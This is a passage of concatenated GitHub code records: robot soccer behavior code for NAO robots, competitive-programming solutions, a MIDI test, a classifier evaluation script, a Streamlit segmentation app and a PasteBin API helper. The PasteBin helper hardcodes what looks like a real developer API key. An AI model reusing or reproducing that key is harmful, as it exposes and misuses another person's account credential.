num_times_sent = 0\n current_state = DefendingStates.block_left\n # choice = \"left\"\n # self.postSignal(choice)\n elif( hit_goal_line > -200 and hit_goal_line < 200):\n #print \" Center: av_px = \" + str(av_px) + \" hit_goal_line = \" + str(hit_goal_line)\n pose_sent = False\n num_times_sent = 0\n current_state = DefendingStates.block\n # choice = \"center\"\n # self.postSignal(choice)\n\n else: # Think ball is still not seen\n #memory.speech.say(\"No ball\")\n commands.stand()\n if ((self.getTime() - last_head_time) > 3):\n if(last_head_pan > 0 ):\n last_head_pan = -1.2\n elif(last_head_pan <= 0):\n last_head_pan = 1.2\n commands.setHeadPan( last_head_pan , 2.5 )\n last_head_time = self.getTime()\n last_x = [0]*last_inf_constant\n last_y = [0]*last_inf_constant\n last_xv = [0]*last_inf_constant\n last_yv = [0]*last_inf_constant\n last_distance =[0]*last_inf_constant\n last_bearing = [0]*last_inf_constant\n\n def defense_block(self):\n global current_state, DefendingStates, pose_sent, pose_start_time, num_times_sent\n #print \"center : =========================================================================\"\n if(self.toPose({\n core.LHipYawPitch: -50.7990128575929,\n core.LHipRoll: -29.7098065875597,\n core.LHipPitch: -36.1211002557756,\n core.LKneePitch: 123.397585319279,\n core.LAnklePitch: -48.8526839844773,\n core.LAnkleRoll: 12.8,\n core.RHipYawPitch: -50,\n core.RHipRoll: -30.6718114113993,\n core.RHipPitch: -37.3563946086858,\n core.RKneePitch: 125.072320383009,\n core.RAnklePitch: -48.5,\n core.RAnkleRoll: 11.4,\n core.LShoulderPitch: -79,\n core.LShoulderRoll: 25,\n core.RShoulderPitch: -79,\n core.RShoulderRoll: 26\n }\n , 1.0\n )):\n #print \"pose time: \" + str(pose_start_time)\n #print \"current time: \" + str(self.getTime())\n if (self.getTime() - pose_start_time) > 4:\n pose_sent = False\n num_times_sent = 0\n pose_start_time = 0\n #print \"CHANGING TO SIT\"\n current_state = DefendingStates.sit\n\n def defense_block_left(self):\n global current_state, DefendingStates, pose_sent, pose_start_time, num_times_sent\n #print \"left : =========================================================================\"\n if(self.toPose({ \n core.RHipYawPitch : 0,\n core.RHipRoll : 20,\n core.RHipPitch : -32,\n core.RKneePitch : 76,\n core.RAnklePitch : -40,\n core.RAnkleRoll : 17,\n core.LHipYawPitch : 0,\n core.LHipRoll : -34,\n core.LHipPitch : -49,\n core.LKneePitch : 125,\n core.LAnklePitch : -70,\n core.LAnkleRoll : -5,\n core.RShoulderPitch : -97,\n core.RShoulderRoll : 7,\n core.LShoulderPitch : -91,\n core.LShoulderRoll : 45\n }\n , 0.5\n )):\n #print \"pose time: \" + str(pose_start_time)\n #print \"current time: \" + str(self.getTime())\n if (self.getTime() - pose_start_time) > 4:\n pose_start_time = 0\n pose_sent = False\n num_times_sent = 0\n #print \"CHANGING TO SIT\"\n current_state = DefendingStates.sit\n\n def defense_block_right(self):\n global current_state, DefendingStates, pose_sent, pose_start_time, num_times_sent\n #print \"right : =========================================================================\"\n if(self.toPose({ \n core.LHipYawPitch : 0 ,\n core.LHipRoll : 20 ,\n core.LHipPitch : -32 ,\n core.LKneePitch : 76 ,\n core.LAnklePitch : -40 ,\n core.LAnkleRoll : 17 ,\n core.RHipYawPitch : 0 ,\n core.RHipRoll : -34 ,\n core.RHipPitch : -49 ,\n core.RKneePitch : 125 ,\n core.RAnklePitch : -70 ,\n core.RAnkleRoll : -5 ,\n core.LShoulderPitch : -97 ,\n core.LShoulderRoll : 7 ,\n core.RShoulderPitch : -91 ,\n core.RShoulderRoll : 45 \n }\n , 0.5\n )):\n #print \"pose time: \" + str(pose_start_time)\n #print \"current time: \" + str(self.getTime())\n if (self.getTime() - pose_start_time) > 4:\n pose_start_time = 0 \n pose_sent = False\n num_times_sent = 0\n #print \"CHANGING TO SIT\"\n current_state = DefendingStates.sit\n\n def defense_sit(self):\n global current_state, DefendingStates, pose_sent, pose_start_time, num_times_sent\n if(self.toPose({ \n core.HeadYaw: 1.8433177928247,\n core.HeadPitch: -22.497878144835,\n core.LHipYawPitch: -4.18321199506924,\n core.LHipRoll: 0.261268396131328,\n core.LHipPitch: -46.5802099129511,\n core.LKneePitch: 123.485476193518,\n core.LAnklePitch: -70.5794592600033,\n core.LAnkleRoll: -0.0902951008275686,\n core.RHipYawPitch: -5.18321199506924,\n core.RHipRoll: 0.266076849307017,\n core.RHipPitch: -47.2002681461832,\n core.RKneePitch: 124.72075688605,\n core.RAnklePitch: -70.3988690583481,\n core.RAnkleRoll: -0.0854866476518796,\n core.LShoulderPitch: -92.0202358571845,\n core.LShoulderRoll: 2.54645844712083,\n core.RShoulderPitch: -92.1129420147891,\n core.RShoulderRoll: 2.55126690029652,\n }\n , 1.5\n )):\n #print \"pose time: \" + str(pose_start_time)\n #print \"current time: \" + str(self.getTime())\n if (self.getTime() - pose_start_time) > 6.5:\n pose_start_time = 0\n pose_sent = False\n num_times_sent = 0\n #print \"CHANGING TO START\"\n current_state = DefendingStates.start\n elif (self.getTime() - pose_start_time) > 3.5:\n commands.stand()\n\n def defense_walk(self):\n global walk_start_time, current_state, DefendingStates\n commands.setHeadTilt(-13)\n commands.setWalkVelocity(0.3,0.0,0.05)\n #print \"walk time: \" + str(walk_start_time)\n #print \"current time: \" + str(self.getTime())\n if (self.getTime() - walk_start_time) > 9.0:\n current_state = DefendingStates.start\n # commands.setWalkVelocity(0.0,0.0,0.0)\n commands.stand()\n\n def defense_walk_left(self):\n commands.setHeadTilt(-13)\n commands.setWalkVelocity(0.0,0.5,0.05)\n\n def defense_walk_right(self):\n commands.setHeadTilt(-13)\n commands.setWalkVelocity(0.0,-0.5,0.05)\n\n def defense_walk_center(self):\n commands.setHeadTilt(-13)\n commands.setWalkVelocity(0.0,0.0,0.0)\n\n#ATTACKING=================================================================================\n def attack_start(self):\n commands.setHeadTilt(-10)\n \n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir\n o_ball = mem_objects.world_objects[core.WO_BALL]\n o_beacon_lm_seen = mem_objects.world_objects[core.WO_BEACON_BLUE_PINK].seen or mem_objects.world_objects[core.WO_BEACON_PINK_BLUE].seen\n o_beacon_rf_seen = mem_objects.world_objects[core.WO_BEACON_YELLOW_PINK].seen or mem_objects.world_objects[core.WO_BEACON_PINK_YELLOW].seen\n o_beacon_rr_seen = mem_objects.world_objects[core.WO_BEACON_YELLOW_BLUE].seen or mem_objects.world_objects[core.WO_BEACON_BLUE_YELLOW].seen\n\n rotation_dir = 1. if (not o_beacon_lm_seen and (o_beacon_rf_seen or o_beacon_rr_seen)) else -1.\n\n if rotation_dir > 0:\n memory.speech.say(\"Started on the left\")\n else:\n memory.speech.say(\"Started on the right\")\n \n if(o_ball.seen): \n current_state = AttackingStates.approach\n else:\n self.walk(0.0, 0.0, rotation_dir*0.2)\n\n def attack_approach(self):\n commands.setHeadTilt(-14)\n \n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir\n o_self = mem_objects.world_objects[robot_state.WO_SELF]\n o_ball = mem_objects.world_objects[core.WO_BALL]\n o_goal = mem_objects.world_objects[core.WO_OPP_GOAL]\n o_enemy = mem_objects.world_objects[core.WO_OPPONENT1]\n\n if(o_ball.seen): \n if(self.walk_to(o_ball, 250)):\n current_state = AttackingStates.rotate\n return\n # else:\n # memory.speech.say(\"Lost the ball\")\n\n def attack_rotate(self):\n commands.setHeadTilt(-16)\n \n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir\n o_self = mem_objects.world_objects[robot_state.WO_SELF]\n o_ball = mem_objects.world_objects[core.WO_BALL]\n o_goal = mem_objects.world_objects[core.WO_OPP_GOAL]\n o_enemy = mem_objects.world_objects[core.WO_OPPONENT1]\n\n if(o_ball.seen and o_goal.seen):\n gy = o_goal.visionDistance * numpy.sin(o_goal.visionBearing)\n if(numpy.abs(gy) <= 200):\n self.stop()\n current_state = AttackingStates.dribble\n return\n\n bx = o_ball.visionDistance * numpy.cos(o_ball.visionBearing)\n x_vel = tanhController(bx - 250, 10.0, 0.3) # 0.1 #-0.05\n y_vel = 0.4\n t_vel = tanhController(o_ball.visionBearing, 10.0, 0.3) \n if(rotation_dir > 0):\n y_vel = y_vel * -1.\n\n self.walk(x_vel, y_vel, t_vel)\n\n\n def attack_dribble(self):\n commands.setHeadTilt(-16)\n \n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir, r_goal_dist_filtered\n o_self = mem_objects.world_objects[robot_state.WO_SELF]\n o_ball = mem_objects.world_objects[core.WO_BALL]\n o_goal = mem_objects.world_objects[core.WO_OPP_GOAL]\n o_enemy = mem_objects.world_objects[core.WO_OPPONENT1]\n\n if(not o_goal.seen):\n #print \"Lost the goal!\"\n self.stop()\n current_state = AttackingStates.rotate\n return\n\n if(not o_ball.seen):\n #print \"Lost the ball!\"\n self.walk(-0.3, 0.0, 0.0)\n return\n\n gx = o_goal.visionDistance * numpy.cos(o_goal.visionBearing)\n gy = o_goal.visionDistance * numpy.sin(o_goal.visionBearing)\n bx = o_ball.visionDistance * numpy.cos(o_ball.visionBearing)\n by = o_ball.visionDistance * numpy.sin(o_ball.visionBearing)\n\n dx_gb = gx - bx\n dy_gb = gy - by\n dt_gb = numpy.arctan2(dy_gb, dx_gb)\n r_goal_ball = numpy.sqrt(dx_gb * dx_gb + dy_gb * dy_gb)\n alpha = 0.3\n r_goal_dist_filtered = alpha*r_goal_ball + (1.0-alpha)*r_goal_dist_filtered\n r_goal_threshold = 750. * numpy.sqrt(2.)\n # r_goal_threshold = 725 * numpy.sqrt(2.)\n\n #print \"gx: \" + str(gx)\n #print \"gy: \" + str(gy)\n #print \"bx: \" + str(bx)\n #print \"by: \" + str(by)\n #print \"dx_gb: \" + str(dx_gb)\n #print \"dy_gb: \" + str(dy_gb)\n #print \"dt_gb: \" + str(dt_gb)\n\n if(r_goal_dist_filtered < r_goal_threshold):\n #print \"Stopping with threshold \" + str(r_goal_dist_filtered)\n # memory.speech.say(\"Distance \" + str(int(r_goal_dist_filtered)) + \", aligning\")\n current_state = AttackingStates.align\n return\n\n x_vel = 0.3 if numpy.abs(by) < 200 else 0.\n y_vel = tanhController((gy + by)/2.0, 20.0/1000.0, 0.35) \n t_vel = tanhController(dy_gb, 10.0/1000.0, 0.2) \n #print \"vel x,y,t = \" + str(x_vel) + \",\" + str(y_vel) + \",\" + str(t_vel)\n self.walk(x_vel, y_vel, t_vel)\n\n def attack_align(self):\n commands.setHeadTilt(-18)\n \n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir, kick_sent, attack_left, r_goal_dist_filtered\n o_self = mem_objects.world_objects[robot_state.WO_SELF]\n o_ball = mem_objects.world_objects[core.WO_BALL]\n o_goal = mem_objects.world_objects[core.WO_OPP_GOAL]\n o_enemy = mem_objects.world_objects[core.WO_OPPONENT1]\n \n if(enemy_state is EnemyGoalStates.unknown):\n if(not o_enemy.seen):\n #print \"Can't find the enemy!\"\n enemy_state = EnemyGoalStates.center\n self.walk(-0.3, 0.0, 0.0)\n return\n if(not o_goal.seen):\n #print \"Can't find the goal!\"\n self.walk(-0.3, 0.0, 0.0)\n return\n else:\n gx = o_goal.visionDistance * numpy.cos(o_goal.visionBearing)\n gy = o_goal.visionDistance * numpy.sin(o_goal.visionBearing)\n ex = o_enemy.visionDistance * numpy.cos(o_enemy.visionBearing)\n ey = o_enemy.visionDistance * numpy.sin(o_enemy.visionBearing)\n center_threshold = o_goal.radius*0.1\n #print \"Threshold: \" + str(center_threshold)\n shift = gy - ey\n if(numpy.abs(shift) < center_threshold):\n # attack_left = bool(random.getrandbits(1))\n attack_left = False\n side_string = str(\"left\" if attack_left else \"right\")\n memory.speech.say(\"Enemy is in the center, shooting to the \" + side_string)\n enemy_state = EnemyGoalStates.center\n elif(shift > 0.):\n memory.speech.say(\"Enemy is on the right, shooting to the left\")\n # attack_left = True\n attack_left = False\n enemy_state = EnemyGoalStates.left\n else:\n memory.speech.say(\"Enemy is on the left, shooting to the right\")\n attack_left = False\n enemy_state = EnemyGoalStates.right\n\n if(not o_goal.seen or not o_ball.seen):\n #print \"Can't find the goal / ball\"\n self.walk(-0.3, 0.0, 0.05)\n return\n\n\n gx = o_goal.visionDistance * numpy.cos(o_goal.visionBearing)\n gy = o_goal.visionDistance * numpy.sin(o_goal.visionBearing)\n bx = o_ball.visionDistance * numpy.cos(o_ball.visionBearing)\n by = o_ball.visionDistance * numpy.sin(o_ball.visionBearing)\n ex = o_enemy.visionDistance * numpy.cos(o_enemy.visionBearing)\n ey = o_enemy.visionDistance * numpy.sin(o_enemy.visionBearing)\n tx = gx\n ty = gy\n dx_gb = gx - bx\n dy_gb = gy - by\n dt_gb = numpy.arctan2(dy_gb, dx_gb)\n r_goal_ball = numpy.sqrt(dx_gb * dx_gb + dy_gb * dy_gb)\n alpha = 0.3\n r_goal_dist_filtered = alpha*r_goal_ball + (1.0-alpha)*r_goal_dist_filtered\n\n if(r_goal_dist_filtered > 2000):\n current_state = AttackingStates.dribble\n # memory.speech.say(\"Distance \" + str(int(r_goal_dist_filtered)) + \", going back\")\n return\n\n if(o_enemy.seen):\n if(attack_left):\n enemy_edge = ey + numpy.sqrt(o_enemy.radius)\n goal_edge = gy + o_goal.radius #yes it's supposed to be different\n ty = (enemy_edge+goal_edge)/2.0\n else:\n enemy_edge = ey - numpy.sqrt(o_enemy.radius)\n goal_edge = gy - o_goal.radius #yes it's supposed to be different\n ty = (enemy_edge+goal_edge)/2.0\n else:\n if(attack_left):\n ty += 3.0 * o_goal.radius / 8.\n else:\n ty -= 3.0 * o_goal.radius / 8.\n\n #print \"gx: \" + str(gx)\n #print \"gy: \" + str(gy)\n #print \"tx: \" + str(tx)\n #print \"ty: \" + str(ty)\n #print \"bx: \" + str(bx)\n #print \"by: \" + str(by)\n\n\n threshold = 65\n ball_x_target = 95\n ball_y_target = -100\n goal_y_target = -100\n\n #override?\n tx = gx\n ty = gy\n if(attack_left):\n ball_y_target += 0\n ty += 250\n else:\n ball_y_target -= 0\n ty -= 250\n\n if (numpy.abs(bx - ball_x_target) <= threshold) and (numpy.abs(by - ball_y_target) <= threshold) and (numpy.abs(ty - goal_y_target) <= threshold) and (numpy.abs(ty - by) <= threshold):\n kick_sent = False\n current_state = AttackingStates.kick\n return\n\n x_vel = tanhController(-(ball_x_target - bx), 10.0/1000.0, 0.3) \n y_vel = tanhController(-(ball_y_target - by), 10.0/1000.0, 0.3) \n t_vel = tanhController((ty - by), 12.0/1000.0, 0.3) \n #print \"vel x,y,t = \" + str(x_vel) + \",\" + str(y_vel) + \",\" + str(t_vel)\n self.walk(x_vel, y_vel, t_vel)\n\n def attack_kick(self):\n commands.setHeadTilt(-20)\n \n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir, kick_sent, kick_start_time, recovering_from_kick\n if not kick_sent:\n #print \"sending kick\"\n # memory.speech.say(\"Kicking\")\n memory.walk_request.noWalk()\n memory.kick_request.setFwdKick()\n kick_start_time = self.getTime()\n kick_sent = True\n recovering_from_kick = False\n elif not recovering_from_kick and kick_sent and (self.getTime() - kick_start_time) > 0.5 and not memory.kick_request.kick_running_:\n # print \"kick is done, recovering\"\n # self.walk(-0.2, -0.1, 0.0)\n # recovering_from_kick = True\n # elif recovering_from_kick and (self.getTime() - kick_start_time) > 7.0:\n # print \"hopefully done recovering\"\n kick_sent = False\n recovering_from_kick = False\n self.stop()\n mode = Modes.passive\n current_state = AttackingStates.dribble\n\n def run(self):\n global walk_start_time, EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir, kick_sent, last_mode_change_time\n\n #detect mode switches\n hf = sensors.getValue(core.headFront)\n hm = sensors.getValue(core.headMiddle)\n hr = sensors.getValue(core.headRear)\n # print \"Head: \" + str(hf) + \", \" + str(hm) + \", \" + str(hr)\n if(mode is not Modes.passive and hf and hm and hr): #need to switch of passive mode\n self.stop()\n memory.speech.say(\"Passive Mode!\")\n mode = Modes.passive\n last_mode_change_time = self.getTime()\n if(mode is not Modes.attacking and hf and hm and not hr and (self.getTime() - last_mode_change_time) > 1.0): #need to switch to attack mode\n memory.speech.say(\"Attack Mode!\")\n mode = Modes.attacking\n enemy_state = EnemyGoalStates.unknown\n kick_sent = False\n r_goal_dist_filtered = 0. \n current_state = AttackingStates.start\n last_mode_change_time = self.getTime()\n if(mode is not Modes.defending and hm and hr and not hf and (self.getTime() - last_mode_change_time) > 1.0): #need to switch to defense mode\n memory.speech.say(\"Defense Mode!\")\n commands.stand()\n pose_sent = False\n num_times_sent = 0\n pose_start_time = 0\n mode = Modes.defending\n current_state = DefendingStates.walk\n walk_start_time = self.getTime()\n last_mode_change_time = self.getTime()\n\n #detect kidnapping\n lfl = sensors.getValue(core.fsrLFL)\n lfr = sensors.getValue(core.fsrLFR)\n lrl = sensors.getValue(core.fsrLRL)\n lrr = sensors.getValue(core.fsrLRR)\n rfl = sensors.getValue(core.fsrRFL)\n rfr = sensors.getValue(core.fsrRFR)\n rrl = sensors.getValue(core.fsrRRL)\n rrr = sensors.getValue(core.fsrRRR)\n max_force = numpy.amax([lfl,lfr,lrl,lrr,rfl,rfr,rrl,rrr])\n # print \"lfl is \" + str(lfl)\n # print \"lfr is \" + str(lfr)\n # print \"lrl is \" + str(lrl)\n # print \"lrr is \" + str(lrr)\n # print \"rfl is \" + str(rfl)\n # print \"rfr is \" + str(rfr)\n # print \"rrl is \" + str(rrl)\n # print \"rrr is \" + str(rrr)\n # print \"max is \" + str(max_force)\n # print \"tilt \" + str((lfl+lrl)/2.-(lfr+lrr)/2.)\n if(numpy.abs(max_force) < 0.10 and mode is not Modes.passive):\n #print(\"***************************************************\")\n #print(\"***************************************************\")\n #print(\"***************************************************\")\n #print(\"numpy.abs(max_force) = \") + str(numpy.abs(max_force))\n memory.speech.say(\"Put me down!\")\n self.stop()\n mode = Modes.passive\n\n #execute the appropriate function\n if(mode is Modes.passive):\n #print \"passive\"\n self.track_ball()\n self.stop()\n return\n else:\n\n function_map = {}\n if(mode is Modes.attacking):\n #print \"Attack mode\"\n function_map = {AttackingStates.start:self.attack_start, \n AttackingStates.approach:self.attack_approach, \n AttackingStates.rotate:self.attack_rotate, \n AttackingStates.dribble:self.attack_dribble, \n AttackingStates.align:self.attack_align, \n AttackingStates.kick:self.attack_kick}\n else:\n #print \"Defense mode\"\n function_map = {DefendingStates.start:self.defense_start, \n DefendingStates.walk_center:self.defense_walk_center, \n DefendingStates.walk_left:self.defense_walk_left, \n DefendingStates.walk_right:self.defense_walk_right, \n DefendingStates.walk:self.defense_walk, \n DefendingStates.block:self.defense_block, \n DefendingStates.block_left:self.defense_block_left, \n DefendingStates.block_right:self.defense_block_right, \n DefendingStates.sit:self.defense_sit\n }\n #print \"Current state: \" + str(current_state)\n function_map[current_state]()\n\n class Off(Node):\n def run(self):\n commands.setStiffness(cfgstiff.Zero)\n if self.getTime() > 2.0:\n self.finish()\n\n def setup(self):\n self.trans(self.Stand(), C, self.Win(), C, pose.Sit(), C, self.Off())\n\n","repo_name":"ypei92/cs393r_autonomous_robot_code","sub_path":"core/python/behaviors/win.py","file_name":"win.py","file_ext":"py","file_size_in_byte":32486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15173030209","text":"N,A = map(int,input().split())\r\nX = [int(x)-A for x in input().split()]\r\n\r\nd = {0:1} \r\n\r\nfor x in X:\r\n d_tmp = d.copy()\r\n for k in d_tmp: \r\n d[k+x] = d.get(k+x,0)+d_tmp[k]\r\nprint(d[0]-1)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc060/A/4801062.py","file_name":"4801062.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"12860612146","text":"# boj 1504 특정한 최단경로 g4\n# noj.am/1504\nimport sys; inp = sys.stdin.readline\nimport heapq\n\nN, E = map(int, inp().split())\ngraph = [[] for _ in range(N + 1)]\n\nINF = 1000000\n# start -> Trough1 -> Trough2 -> end, start -> Trough2 -> Trough1 -> end 중 최소값을 구하면 된다\ndistStart = [INF for _ in range(N + 1)]\ndistThrough1 = [INF for _ in range(N + 1)]\ndistThrough2 = [INF for _ in range(N + 1)]\n\nfor _ in range(E):\n a, b, c = map(int, inp().split())\n graph[a].append((b, c))\n graph[b].append((a, c)) # 양방향\n\ndef dijkstra(dist, start):\n pq = [(0, start)]\n dist[start] = 0\n\n while pq:\n dis, next = heapq.heappop(pq)\n if dis > dist[next]:\n continue\n\n for nextNode, nextDist in graph[next]:\n if dist[nextNode] > nextDist + dis:\n dist[nextNode] = nextDist + dis\n heapq.heappush(pq, (dist[nextNode], nextNode))\n\n\nthrough1, through2 = map(int, inp().split())\n\ndijkstra(distStart, 1) # 3개를 구해서 경우의 수를 따져 최소 경로를 구한다\ndijkstra(distThrough1, through1)\ndijkstra(distThrough2, through2)\n\nans = min(distStart[through1] + distThrough1[through2] + distThrough2[N], distStart[through2] + distThrough2[through1] + distThrough1[N])\nif ans >= INF:\n print(-1)\nelse:\n print(ans)","repo_name":"LastCow9000/Algorithms","sub_path":"Algorithm/BOJ/1504_특정한 최단경로_g4/1504.py","file_name":"1504.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8750779038","text":"import argparse\nfrom tqdm import tqdm\n\nfrom reflection_classification.utils.dataset import ReflexiveDataset\nfrom reflection_classification.neural_classifier import NeuralClassifier\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser()\n\n argparser.add_argument('--trained_model_dir', type=str, required=True,\n help='Local path containing pre-trained model, filled on training, or downloaded separately')\n argparser.add_argument('--sentences_dir', type=str, required=True,\n help='Directory with {split}/sentence.tsv of annotated sentences')\n argparser.add_argument('--device', type=str, help='Device used to infer. One of {cpu, cuda, cuda:[idx]}',\n default=\"cuda\")\n argparser.add_argument('--test_confidence_threshold', type=int,\n help='Minimal confidence threshold for sentences to test on.',\n default=5)\n argparser.add_argument('--use_context', type=bool, help='Whether the model was trainer using context.',\n default=True)\n\n args = argparser.parse_args()\n\n classifier = NeuralClassifier(args.trained_model_dir, args.use_context, args.device)\n test_sentences = ReflexiveDataset.sentences_from_tsv(args.sentences_dir, \"test\",\n args.test_confidence_threshold, args.use_context)\n\n y_pred = [classifier.predict_sentence(sentence.text, sentence.context) for sentence in tqdm(test_sentences)]\n\n y_trues = [sentence.label for sentence in test_sentences]\n\n y_truepos = [y_trues[i] == y_pred[i] for i, _ in enumerate(y_pred)]\n\n print(\"Test accuracy: %s\" % (sum(y_truepos) / len(y_truepos)))\n","repo_name":"EduMUNI/reflection-classification","sub_path":"scripts/eval_neural_classifier.py","file_name":"eval_neural_classifier.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"30258082239","text":"import requests\nfrom typing import Union\n\ndef create_paste(title: str, body: str, expire: str, public: bool) -> Union[str, None]:\n \"\"\"\n Create a new PasteBin paste using the PasteBin API.\n\n Args:\n title (str): The title of the new paste.\n body (str): The body text of the new paste.\n expire (str): The expiration period of the new paste. Valid values are \"N\", \"10M\", \"1H\", \"1D\", or \"1W\".\n public (bool): Whether the new paste should be publicly listed or not.\n\n Returns:\n str or None: The URL of the newly created paste if it's created successfully, or None if the new paste is not\n created successfully.\n\n Raises:\n ValueError: If the expiration period is not a valid value.\n \"\"\"\n # Fill in your own PasteBin developer API key\n api_key = \"mB2Zh82SMqpg_3BqejDt-wfobHtUZpUt\"\n\n # Construct the data dictionary for the PasteBin API\n data = {\n \"api_dev_key\": api_key,\n \"api_option\": \"paste\",\n \"api_paste_code\": body,\n \"api_paste_name\": title,\n \"api_paste_expire_date\": expire,\n \"api_paste_private\": \"0\" if public else \"1\"\n }\n \n # Make a POST request to the PasteBin API\n url = \"https://pastebin.com/api/api_post.php\"\n response = requests.post(url, data=data)\n \n # Check if the paste was created successfully\n if response.status_code == 200:\n \n # Extract the URL of the new paste from the response text\n url = response.text\n print(f\"Paste created successfully. URL: {url}\")\n return url\n else:\n print(\"Error creating paste:\", response.text)\n return None\n","repo_name":"Krunalhb/COMP593-Lab5","sub_path":"pastebin_api.py","file_name":"pastebin_api.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9914042643","text":"\"\"\"\nGiven a signed 32-bit integer x, return x with its digits \nreversed. If reversing x causes the value to go outside the \nsigned 32-bit integer range [-231, 231 - 1], then return 0.\n\nAssume the environment does not allow you to store 64-bit \nintegers (signed or unsigned). \n\nExample 1:\nInput: x = 123\nOutput: 321\n\nExample 2:\nInput: x = -123\nOutput: -321\n\nExample 3:\nInput: x = 120\nOutput: 21\n\nExample 4:\nInput: x = 0\nOutput: 0\n\nConstraints:\n-231 <= x <= 231 - 1\n\"\"\"\n\n\nclass Solution:\n def reverse(self, x: int) -> int:\n min = -2 ** 31\n max = ((2 ** 31) -1)\n \n # Option 1\n# temp = 0\n \n# while (abs(x) > 0):\n# # note: modulus and floor division operators work \n# # different for negative numbers in python than \n# # java/c++ \n# temp = (temp * 10) + int((math.fmod(x, 10)))\n# x = int(x / 10)\n \n # Option 2\n temp = (-int(str(x)[:0:-1]) if x < 0 else int(str(x)[::-1]))\n \n return (0 if (temp < min or temp > max) else temp)\n ","repo_name":"nyccowgirl/coding-challenges","sub_path":"leet/Python/reverseint.py","file_name":"reverseint.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"756916886","text":"import pytest\r\n\r\nfrom MidiCompose.objects import Note,Chord,ChordSequence\r\n\r\ndef test_constructor():\r\n valid = [\r\n Chord([Note(60),Note(64),Note(67)]),\r\n Chord.from_figured_bass(figured_bass=(Note(\"C3\"),[4,5,6]))\r\n ]\r\n\r\n cs = ChordSequence(chords=valid)\r\n\r\n assert len(cs) == 2\r\n assert cs[0].notes == [Note(60),Note(64),Note(67)]\r\n assert cs.max_notes == 4\r\n assert all([isinstance(c,Chord) for c in cs])\r\n\r\ndef test_constructor_fails():\r\n\r\n invalid_chords = [\r\n Chord([Note(34), Note(35)]),\r\n [36, 38]\r\n ]\r\n with pytest.raises(TypeError):\r\n cs = ChordSequence(chords=invalid_chords)\r\n\r\n\r\n","repo_name":"aParthemer/MidiCompose","sub_path":"tests/test_logic/test_harmony/test_ChordSequence.py","file_name":"test_ChordSequence.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17179452782","text":"import subprocess\nfrom pathlib import Path\n\nimport streamlit as st\nfrom jinja2 import Environment, FileSystemLoader\n\nfrom autorad.utils import io\nfrom autorad.webapp import segmentation_utils, st_read, st_utils\n\n# get the path of the current file with pathlib.Path\nseg_dir = Path(__file__).parent.parent / \"templates/segmentation\"\njson_path = seg_dir / \"pretrained_models.json\"\nmodels_metadata = io.load_json(json_path)\n\n\ndef show():\n st_utils.show_title()\n input_dir = st_read.get_input_dir()\n model_name = None\n organ_label = None\n with st.sidebar:\n modalities = [\"CT\", \"MRI\"]\n modality = st.selectbox(\"Modality\", modalities)\n regions = segmentation_utils.get_region_names(models_metadata)\n region = st.selectbox(\"Region\", regions)\n matching_models_metadata = segmentation_utils.filter_models_metadata(\n models_metadata, modality, region\n )\n organs = segmentation_utils.get_organ_names(matching_models_metadata)\n organ = st.selectbox(\"Organ\", organs)\n if not organ:\n st.warning(\"No models found for this modality and region.\")\n if organ:\n final_models_metadata = (\n segmentation_utils.filter_models_metadata_by_organ(\n matching_models_metadata, organ\n )\n )\n final_model_names = list(final_models_metadata.keys())\n model_name = st.radio(\"Available models\", final_model_names)\n organ_label = segmentation_utils.get_organ_label(\n final_models_metadata[model_name], organ\n )\n st.markdown(\n \"\"\"\n ### Instructions\n If you don't have the segmentations for your dataset,\n you have two options: \\n\n 1. **Manual segmentation** - outline the organ contours by yourself in a program.\n - We recommend using [3D Slicer](https://www.slicer.org/) or [MITK](https://www.mitk.org/wiki/The_Medical_Imaging_Interaction_Toolkit_(MITK)).\n - There may be an extension/functionality (e.g. interpolation between slices) to make the process faster.\\n\n 2. **Automatic segmentation** - check in the sidebar on the left if there's a trained model available for your use case.\n - Take into account, that it'll only work when the organ and modality are matching.\n - Even then, it's not guaranteed to work well and you should always visually check the results.\n - It **requires a GPU**! The GPU should have at least 4 GB of VRAM.\n - The segmentation uses nnU-Net. If you're using it, please cite the original paper:\n `Isensee, F., Jaeger, P.F., Kohl, S.A.A. et al. \"nnU-Net: a self-configuring method for deep learning-based biomedical image segmentation.\" Nat Methods (2020). https://doi.org/10.1038/s41592-020-01008-z`\n \"\"\"\n )\n st.markdown(\"### Input\")\n nifti_dir = segmentation_utils.dicom_to_nifti_expander(data_dir=input_dir)\n st.markdown(\"### Segmentation with nnU-Net\")\n input_dir = st.text_input(\n \"Path to the directory with images\", value=nifti_dir\n )\n input_dir = Path(input_dir.strip('\"'))\n if not input_dir.is_dir():\n st.error(\"Directory not found!\")\n files = list(input_dir.glob(\"*.nii.gz\"))\n if files:\n st.success(f\"{len(files)} images found!\")\n model_dim = st.selectbox(\"Model\", [\"2D\", \"3D\"])\n mode = \"2d\" if model_dim == \"2D\" else \"3d_fullres\"\n\n # load the template\n if not model_name:\n st.stop()\n st.markdown(\n \"\"\"\n To create the automatic segmentations, you should run\n the code below in an interactive notebook:\n \"\"\"\n )\n env = 